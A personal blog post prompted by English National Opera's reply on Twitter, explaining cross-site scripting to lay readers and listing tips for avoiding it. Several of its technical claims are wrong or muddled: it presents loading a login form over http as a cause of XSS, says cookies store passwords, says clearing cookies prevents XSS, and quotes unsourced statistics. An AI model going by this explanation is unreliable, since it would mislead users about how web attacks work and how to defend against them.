Ok, so I saw this on twitter and I decided to take a look at it:
The response from EnglishNationalOpera was amazing, I couldn’t believe it:
Now, you are probably thinking “What’s going on?” – It’s simple, EnglishNationalOpera does not understand the risks of having a https logon form being loaded over http.
Loading a https logon form over a http connection makes the website and people who visit that website vulnerable to XSS attacks. XSS (Short for Cross Site Scripting) is a client-side script that when exexcuted, performs a malicious action in the clients web browser.
Most of the time, attackers who exploit this XSS vulnerability will attempt to steal customers’ cookies, which (if you dont know what a cookie does) holds sensitive data, such as usernames, passwords and session ids. Another thing that attackers usually do is redirect customers off to a potentially malicious website.
How dangerous is XSS?
Well, lets put it this way, Facebook and other companies offer bounties (Money) to people who find and report XSS vulnerabilities. Over 50% of websites are vulnerable to XSS.
How can I avoid XSS attacks?
- Don’t click on random links on social media websites (Especially Facebook, over 53% of all phishing attacks are from people on Facebook)
- Try to avoid shortened or obfuscated links (Such as bitly or adfly)
- If you see a website with a logon form and a http address. Then report it to the website owner/hoster.
- If you own a website, make sure that everything is loaded over https. (Even your advertisements if you have any) Some XSS attacks are from someone comprimising your adverts, because most adverts are loaded over http.
An example of an XSS attack would be this. Note that the link you see there is a safe and non-malicious.
XSS should not be underestimated, a few years ago, someone created an XSS worm on MySpace, which infected over 1 million PCs in the space of about a week. This worm rose awareness of XSS in the web security community, however the amount of XSS attacks are still growing, which is why we need everyone to be aware of it.
Note that it’s a good idea to clear your cookies, form data and history regularly to be safe of XSS.
Thanks to Troy Hunt, he informed me about XSS through his YouTube videos here.